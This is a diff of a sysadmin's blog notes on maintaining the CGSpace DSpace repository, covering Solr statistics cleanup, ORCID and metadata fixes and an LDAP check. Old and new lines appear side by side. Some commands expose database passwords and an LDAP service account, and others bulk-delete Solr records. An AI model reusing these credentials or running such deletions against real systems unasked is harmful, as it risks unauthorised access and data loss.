at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
@ -398,71 +398,71 @@ java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's mo
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/[0-9]+/&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/[0-9]+/&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><h2 id="2020-08-09">2020-08-09</h2>
<ul>
<li>The Atmire script did something to the server and created 132GB of log files so the root partition ran out of space&hellip;</li>
<li>I removed the log file and tried to re-run the process but it seems to be looping over 11,000 records and failing, creating millions of lines in the logs again:</li>
</ul>
<pre tabindex="0"><code># grep -oE &quot;Record uid: ([a-f0-9\\-]*){1} couldn't be processed&quot; /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 &gt; /tmp/not-processed-errors.txt
<pre tabindex="0"><code># grep -oE &#34;Record uid: ([a-f0-9\\-]*){1} couldn&#39;t be processed&#34; /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 &gt; /tmp/not-processed-errors.txt
# wc -l /tmp/not-processed-errors.txt
2202973 /tmp/not-processed-errors.txt
# sort /tmp/not-processed-errors.txt | uniq -c | tail -n 10
220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn't be processed
220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn't be processed
220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn't be processed
220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn't be processed
220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn't be processed
221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn't be processed
220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn't be processed
220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn't be processed
221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn't be processed
221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn't be processed
220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn&#39;t be processed
220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn&#39;t be processed
220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn&#39;t be processed
220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn&#39;t be processed
220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn&#39;t be processed
221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn&#39;t be processed
220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn&#39;t be processed
220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn&#39;t be processed
221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn&#39;t be processed
221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn&#39;t be processed
</code></pre><ul>
<li>I looked at some of those records and saw strange objects in their <code>containerCommunity</code>, <code>containerCollection</code>, etc&hellip;</li>
</ul>
<pre tabindex="0"><code>{
&quot;responseHeader&quot;: {
&quot;status&quot;: 0,
&quot;QTime&quot;: 0,
&quot;params&quot;: {
&quot;q&quot;: &quot;uid:fff1349d-79d5-4ceb-89a1-ce78107d982d&quot;,
&quot;indent&quot;: &quot;true&quot;,
&quot;wt&quot;: &quot;json&quot;,
&quot;_&quot;: &quot;1596957629970&quot;
&#34;responseHeader&#34;: {
&#34;status&#34;: 0,
&#34;QTime&#34;: 0,
&#34;params&#34;: {
&#34;q&#34;: &#34;uid:fff1349d-79d5-4ceb-89a1-ce78107d982d&#34;,
&#34;indent&#34;: &#34;true&#34;,
&#34;wt&#34;: &#34;json&#34;,
&#34;_&#34;: &#34;1596957629970&#34;
}
},
&quot;response&quot;: {
&quot;numFound&quot;: 1,
&quot;start&quot;: 0,
&quot;docs&quot;: [
&#34;response&#34;: {
&#34;numFound&#34;: 1,
&#34;start&#34;: 0,
&#34;docs&#34;: [
{
&quot;containerCommunity&quot;: [
&quot;155&quot;,
&quot;155&quot;,
&quot;{set=null}&quot;
&#34;containerCommunity&#34;: [
&#34;155&#34;,
&#34;155&#34;,
&#34;{set=null}&#34;
],
&quot;uid&quot;: &quot;fff1349d-79d5-4ceb-89a1-ce78107d982d&quot;,
&quot;containerCollection&quot;: [
&quot;1099&quot;,
&quot;830&quot;,
&quot;{set=830}&quot;
&#34;uid&#34;: &#34;fff1349d-79d5-4ceb-89a1-ce78107d982d&#34;,
&#34;containerCollection&#34;: [
&#34;1099&#34;,
&#34;830&#34;,
&#34;{set=830}&#34;
],
&quot;owningComm&quot;: [
&quot;155&quot;,
&quot;155&quot;,
&quot;{set=null}&quot;
&#34;owningComm&#34;: [
&#34;155&#34;,
&#34;155&#34;,
&#34;{set=null}&#34;
],
&quot;isInternal&quot;: false,
&quot;isBot&quot;: false,
&quot;statistics_type&quot;: &quot;view&quot;,
&quot;time&quot;: &quot;2018-05-08T23:17:00.157Z&quot;,
&quot;owningColl&quot;: [
&quot;1099&quot;,
&quot;830&quot;,
&quot;{set=830}&quot;
&#34;isInternal&#34;: false,
&#34;isBot&#34;: false,
&#34;statistics_type&#34;: &#34;view&#34;,
&#34;time&#34;: &#34;2018-05-08T23:17:00.157Z&#34;,
&#34;owningColl&#34;: [
&#34;1099&#34;,
&#34;830&#34;,
&#34;{set=830}&#34;
],
&quot;_version_&quot;: 1621500445042147300
&#34;_version_&#34;: 1621500445042147300
}
]
}
@ -470,8 +470,8 @@ java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's mo
</code></pre><ul>
<li>I deleted those 11,724 records with the strange &ldquo;set&rdquo; object in the collections and communities, as well as 360,000 records with <code>id: -1</code></li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;'
$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:\-1&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;&#39;
$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:\-1&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>I was going to compare the CUA stats for 2018 and 2019 on CGSpace and DSpace Test, but after Linode rebooted CGSpace (linode18) for maintenance yesterday the solr cores didn&rsquo;t all come back up OK
<ul>
@ -487,24 +487,24 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=tru
</ul>
<pre tabindex="0"><code>$ cat 2020-08-09-add-ILRI-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Grace, Delia&quot;,&quot;Delia Grace: 0000-0002-0195-9489&quot;
&quot;Delia Grace&quot;,&quot;Delia Grace: 0000-0002-0195-9489&quot;
&quot;Baker, Derek&quot;,&quot;Derek Baker: 0000-0001-6020-6973&quot;
&quot;Ngan Tran Thi&quot;,&quot;Tran Thi Ngan: 0000-0002-7184-3086&quot;
&quot;Dang Xuan Sinh&quot;,&quot;Sinh Dang-Xuan: 0000-0002-0522-7808&quot;
&quot;Hung Nguyen-Viet&quot;,&quot;Hung Nguyen-Viet: 0000-0001-9877-0596&quot;
&quot;Pham Van Hung&quot;,&quot;Pham Anh Hung: 0000-0001-9366-0259&quot;
&quot;Lindahl, Johanna F.&quot;,&quot;Johanna Lindahl: 0000-0002-1175-0398&quot;
&quot;Teufel, Nils&quot;,&quot;Nils Teufel: 0000-0001-5305-6620&quot;
&quot;Duncan, Alan J.&quot;,Alan Duncan: 0000-0002-3954-3067&quot;
&quot;Moodley, Arshnee&quot;,&quot;Arshnee Moodley: 0000-0002-6469-3948&quot;
&#34;Grace, Delia&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
&#34;Delia Grace&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
&#34;Baker, Derek&#34;,&#34;Derek Baker: 0000-0001-6020-6973&#34;
&#34;Ngan Tran Thi&#34;,&#34;Tran Thi Ngan: 0000-0002-7184-3086&#34;
&#34;Dang Xuan Sinh&#34;,&#34;Sinh Dang-Xuan: 0000-0002-0522-7808&#34;
&#34;Hung Nguyen-Viet&#34;,&#34;Hung Nguyen-Viet: 0000-0001-9877-0596&#34;
&#34;Pham Van Hung&#34;,&#34;Pham Anh Hung: 0000-0001-9366-0259&#34;
&#34;Lindahl, Johanna F.&#34;,&#34;Johanna Lindahl: 0000-0002-1175-0398&#34;
&#34;Teufel, Nils&#34;,&#34;Nils Teufel: 0000-0001-5305-6620&#34;
&#34;Duncan, Alan J.&#34;,Alan Duncan: 0000-0002-3954-3067&#34;
&#34;Moodley, Arshnee&#34;,&#34;Arshnee Moodley: 0000-0002-6469-3948&#34;
</code></pre><ul>
<li>That got me curious, so I generated a list of all the unique ORCID identifiers we have in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240) TO /tmp/2020-08-09-orcid-identifiers.csv;
COPY 2095
dspace=# \q
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq &gt; /tmp/2020-08-09-orcid-identifiers-uniq.csv
$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq &gt; /tmp/2020-08-09-orcid-identifiers-uniq.csv
$ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
1949 /tmp/2020-08-09-orcid-identifiers-uniq.csv
</code></pre><ul>
@ -517,9 +517,9 @@ $ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;&#39;
...
$ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;'
$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>I added <code>Googlebot</code> and <code>Twitterbot</code> to the list of explicitly allowed bots
<ul>
@ -573,7 +573,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=tru
<ul>
<li>Last night I started the processing of the statistics-2016 core with the Atmire stats util and I see some errors like this:</li>
</ul>
<pre tabindex="0"><code>Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn't be processed
<pre tabindex="0"><code>Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: f6b288d7-d60d-4df9-b311-1696b88552a0, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
@ -598,8 +598,8 @@ Caused by: java.lang.NullPointerException
</li>
<li>I purged the unmigrated docs and continued processing:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2016/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;'
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2016
</code></pre><ul>
<li>Altmetric asked for a dump of CGSpace&rsquo;s OAI &ldquo;sets&rdquo; so they can update their affiliation mappings
@ -608,8 +608,8 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'https://cgspace.cgiar.org/oai/request?verb=ListSets' &gt; /tmp/0.xml
$ for num in {100..1300..100}; do http &quot;https://cgspace.cgiar.org/oai/request?verb=ListSets&amp;resumptionToken=////$num&quot; &gt; /tmp/$num.xml; sleep 2; done
<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/oai/request?verb=ListSets&#39; &gt; /tmp/0.xml
$ for num in {100..1300..100}; do http &#34;https://cgspace.cgiar.org/oai/request?verb=ListSets&amp;resumptionToken=////$num&#34; &gt; /tmp/$num.xml; sleep 2; done
$ for num in {0..1300..100}; do cat /tmp/$num.xml &gt;&gt; /tmp/cgspace-oai-sets.xml; done
</code></pre><ul>
<li>This produces one file that has all the sets, albeit with 14 pages of responses concatenated into one document, but that&rsquo;s how theirs was in the first place&hellip;</li>
@ -620,9 +620,9 @@ $ for num in {0..1300..100}; do cat /tmp/$num.xml &gt;&gt; /tmp/cgspace-oai-sets
<li>The com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script that was processing 2015 records last night started spitting shit tons of errors and created 120GB of logs&hellip;</li>
<li>I looked at a few of the UIDs that it was having problems with and they were unmigrated ones&hellip; so I purged them in 2015 and all the rest of the statistics cores</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2015/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
...
$ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;'
$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><h2 id="2020-08-19">2020-08-19</h2>
<ul>
<li>I tested the DSpace 5 and DSpace 6 versions of the <a href="https://github.com/ilri/cgspace-java-helpers">country code tagger curation task</a> and noticed a few things
@ -715,17 +715,17 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=tru
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=0' User-Agent:'curl' &gt; /tmp/wle-trade-off-page1.xml
$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=100' User-Agent:'curl' &gt; /tmp/wle-trade-off-page2.xml
$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=200' User-Agent:'curl' &gt; /tmp/wle-trade-off-page3.xml
<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=0&#39; User-Agent:&#39;curl&#39; &gt; /tmp/wle-trade-off-page1.xml
$ http &#39;https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=100&#39; User-Agent:&#39;curl&#39; &gt; /tmp/wle-trade-off-page2.xml
$ http &#39;https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=200&#39; User-Agent:&#39;curl&#39; &gt; /tmp/wle-trade-off-page3.xml
</code></pre><ul>
<li>Ugh, and to extract the <code>&lt;id&gt;</code> from each <code>&lt;entry&gt;</code> we have to use an XPath query, but use a <a href="http://blog.powered-up-games.com/wordpress/archives/70">hack to ignore the default namespace by setting each element&rsquo;s local name</a>:</li>
</ul>
<pre tabindex="0"><code>$ xmllint --xpath '//*[local-name()=&quot;entry&quot;]/*[local-name()=&quot;id&quot;]/text()' /tmp/wle-trade-off-page1.xml &gt;&gt; /tmp/ids.txt
$ xmllint --xpath '//*[local-name()=&quot;entry&quot;]/*[local-name()=&quot;id&quot;]/text()' /tmp/wle-trade-off-page2.xml &gt;&gt; /tmp/ids.txt
$ xmllint --xpath '//*[local-name()=&quot;entry&quot;]/*[local-name()=&quot;id&quot;]/text()' /tmp/wle-trade-off-page3.xml &gt;&gt; /tmp/ids.txt
<pre tabindex="0"><code>$ xmllint --xpath &#39;//*[local-name()=&#34;entry&#34;]/*[local-name()=&#34;id&#34;]/text()&#39; /tmp/wle-trade-off-page1.xml &gt;&gt; /tmp/ids.txt
$ xmllint --xpath &#39;//*[local-name()=&#34;entry&#34;]/*[local-name()=&#34;id&#34;]/text()&#39; /tmp/wle-trade-off-page2.xml &gt;&gt; /tmp/ids.txt
$ xmllint --xpath &#39;//*[local-name()=&#34;entry&#34;]/*[local-name()=&#34;id&#34;]/text()&#39; /tmp/wle-trade-off-page3.xml &gt;&gt; /tmp/ids.txt
$ sort -u /tmp/ids.txt &gt; /tmp/ids-sorted.txt
$ grep -oE '[0-9]+/[0-9]+' /tmp/ids.txt &gt; /tmp/handles.txt
$ grep -oE &#39;[0-9]+/[0-9]+&#39; /tmp/ids.txt &gt; /tmp/handles.txt
</code></pre><ul>
<li>Now I have all the handles for the matching items and I can use the REST API to get each item&rsquo;s PDFs&hellip;
<ul>

View File

@ -48,7 +48,7 @@ I filed a bug on OpenRXV: https://github.com/ilri/OpenRXV/issues/39
I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -173,7 +173,7 @@ $ grep -c added /tmp/2020-09-02-countrycodetagger.log
</code></pre><ul>
<li>I tried to query LDAP directly using the application credentials with ldapsearch and it works:</li>
</ul>
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;applicationaccount@cgiarad.org&quot; -W &quot;(sAMAccountName=me)&quot;
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;applicationaccount@cgiarad.org&#34; -W &#34;(sAMAccountName=me)&#34;
</code></pre><ul>
<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC6x/Authentication+Plugins#AuthenticationPlugins-LDAPAuthentication">DSpace 6 docs</a> we need to escape commas in our LDAP parameters due to the new configuration system
<ul>
@ -206,8 +206,8 @@ Report
Formally Published
Poster
Unrefereed reprint
$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -m 68
$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -t 'correct' -m 68
$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.version -m 68
$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.version -t &#39;correct&#39; -m 68
</code></pre><ul>
<li>Start reviewing 95 items for IITA (20201stbatch)
<ul>
@ -259,9 +259,9 @@ java.lang.NullPointerException
</li>
<li>I will update our nearly 6,000 metadata values for CIFOR in the database accordingly:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$', 'https://www.cifor.org/knowledge/publication/\3') WHERE metadata_field_id=219 AND text_value ~ 'www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+';
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/library/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/library/[[:digit:]]+/?';
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/pid/[[:digit:]]+';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$&#39;, &#39;https://www.cifor.org/knowledge/publication/\3&#39;) WHERE metadata_field_id=219 AND text_value ~ &#39;www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+&#39;;
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;^https?://www\.cifor\.org/library/([[:digit:]]+)/?$&#39;, &#39;https://www.cifor.org/knowledge/publication/\1&#39;) WHERE metadata_field_id=219 AND text_value ~ &#39;https?://www\.cifor\.org/library/[[:digit:]]+/?&#39;;
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$&#39;, &#39;https://www.cifor.org/knowledge/publication/\1&#39;) WHERE metadata_field_id=219 AND text_value ~ &#39;https?://www\.cifor\.org/pid/[[:digit:]]+&#39;;
</code></pre><ul>
<li>I did some cleanup on the author affiliations of the IITA data our 2019-04 list using reconcile-csv and OpenRefine:
<ul>
@ -328,7 +328,7 @@ AFRICA SOUTH OF SAHARA,SUB-SAHARAN AFRICA
NORTH AFRICA,NORTHERN AFRICA
WEST ASIA,WESTERN ASIA
SOUTHWEST ASIA,SOUTHWESTERN ASIA
$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d -n
$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -t &#39;correct&#39; -m 227 -d -n
Connected to database.
Would fix 12227 occurences of: EAST AFRICA
Would fix 7996 occurences of: WEST AFRICA
@ -417,7 +417,7 @@ Would fix 3 occurences of: SOUTHWEST ASIA
</ul>
</li>
</ul>
<pre tabindex="0"><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Then I created a SAF bundle with SAFBuilder:</li>
</ul>
@ -477,9 +477,9 @@ Would fix 3 occurences of: SOUTHWEST ASIA
</ul>
<pre tabindex="0"><code>$ cat 2020-09-17-add-bioversity-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Etten, Jacob van&quot;,&quot;Jacob van Etten: 0000-0001-7554-2558&quot;
&quot;van Etten, Jacob&quot;,&quot;Jacob van Etten: 0000-0001-7554-2558&quot;
$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p 'dom@in34sniper'
&#34;Etten, Jacob van&#34;,&#34;Jacob van Etten: 0000-0001-7554-2558&#34;
&#34;van Etten, Jacob&#34;,&#34;Jacob van Etten: 0000-0001-7554-2558&#34;
$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p &#39;dom@in34sniper&#39;
</code></pre><ul>
<li>I sent a follow-up message to Atmire to look into the two remaining issues with the DSpace 6 upgrade
<ul>
@ -496,7 +496,7 @@ $ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dsp
</ul>
</li>
</ul>
<pre tabindex="0"><code>https://cgspace.cgiar.org/open-search/discover?query=type:&quot;Journal Article&quot; AND status:&quot;Open Access&quot; AND crpsubject:&quot;Water, Land and Ecosystems&quot; AND &quot;tradeoffs&quot;&amp;rpp=100
<pre tabindex="0"><code>https://cgspace.cgiar.org/open-search/discover?query=type:&#34;Journal Article&#34; AND status:&#34;Open Access&#34; AND crpsubject:&#34;Water, Land and Ecosystems&#34; AND &#34;tradeoffs&#34;&amp;rpp=100
</code></pre><ul>
<li>I noticed that my <code>move-collections.sh</code> script didn&rsquo;t work on DSpace 6 because of the change from IDs to UUIDs, so I modified it to quote the collection <code>resource_id</code> parameters in the PostgreSQL query</li>
</ul>
@ -538,7 +538,7 @@ dspacestatistics=# SELECT SUM(downloads) FROM items;
</ul>
<pre tabindex="0"><code>dspace=# BEGIN;
BEGIN
dspace=# DELETE FROM metadatavalue WHERE text_value='Report' AND resource_type_id=2 AND metadata_field_id=68;
dspace=# DELETE FROM metadatavalue WHERE text_value=&#39;Report&#39; AND resource_type_id=2 AND metadata_field_id=68;
DELETE 12
dspace=# COMMIT;
</code></pre><ul>
@ -573,23 +573,23 @@ dspace=# COMMIT;
</li>
</ul>
<pre tabindex="0"><code>...
item_ids = ['0079470a-87a1-4373-beb1-b16e3f0c4d81', '007a9df1-0871-4612-8b28-5335982198cb']
item_ids_str = ' OR '.join(item_ids).replace('-', '\-')
item_ids = [&#39;0079470a-87a1-4373-beb1-b16e3f0c4d81&#39;, &#39;007a9df1-0871-4612-8b28-5335982198cb&#39;]
item_ids_str = &#39; OR &#39;.join(item_ids).replace(&#39;-&#39;, &#39;\-&#39;)
...
solr_query_params = {
&quot;q&quot;: f&quot;id:({item_ids_str})&quot;,
&quot;fq&quot;: &quot;type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]&quot;,
&quot;facet&quot;: &quot;true&quot;,
&quot;facet.field&quot;: &quot;id&quot;,
&quot;facet.mincount&quot;: 1,
&quot;facet.limit&quot;: 1,
&quot;facet.offset&quot;: 0,
&quot;stats&quot;: &quot;true&quot;,
&quot;stats.field&quot;: &quot;id&quot;,
&quot;stats.calcdistinct&quot;: &quot;true&quot;,
&quot;shards&quot;: shards,
&quot;rows&quot;: 0,
&quot;wt&quot;: &quot;json&quot;,
&#34;q&#34;: f&#34;id:({item_ids_str})&#34;,
&#34;fq&#34;: &#34;type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]&#34;,
&#34;facet&#34;: &#34;true&#34;,
&#34;facet.field&#34;: &#34;id&#34;,
&#34;facet.mincount&#34;: 1,
&#34;facet.limit&#34;: 1,
&#34;facet.offset&#34;: 0,
&#34;stats&#34;: &#34;true&#34;,
&#34;stats.field&#34;: &#34;id&#34;,
&#34;stats.calcdistinct&#34;: &#34;true&#34;,
&#34;shards&#34;: shards,
&#34;rows&#34;: 0,
&#34;wt&#34;: &#34;json&#34;,
}
</code></pre><ul>
<li>The date range format for Solr is important, but it seems we only need to add <code>T00:00:00Z</code> to the normal ISO 8601 YYYY-MM-DD strings</li>
@ -600,61 +600,61 @@ solr_query_params = {
</ul>
<pre tabindex="0"><code>$ curl -s -d @request.json https://dspacetest.cgiar.org/rest/statistics/items | json_pp
{
&quot;currentPage&quot; : 0,
&quot;limit&quot; : 10,
&quot;statistics&quot; : [
&#34;currentPage&#34; : 0,
&#34;limit&#34; : 10,
&#34;statistics&#34; : [
{
&quot;downloads&quot; : 3329,
&quot;id&quot; : &quot;b2c1bbfd-65b0-438c-9e49-d271c49b2696&quot;,
&quot;views&quot; : 1565
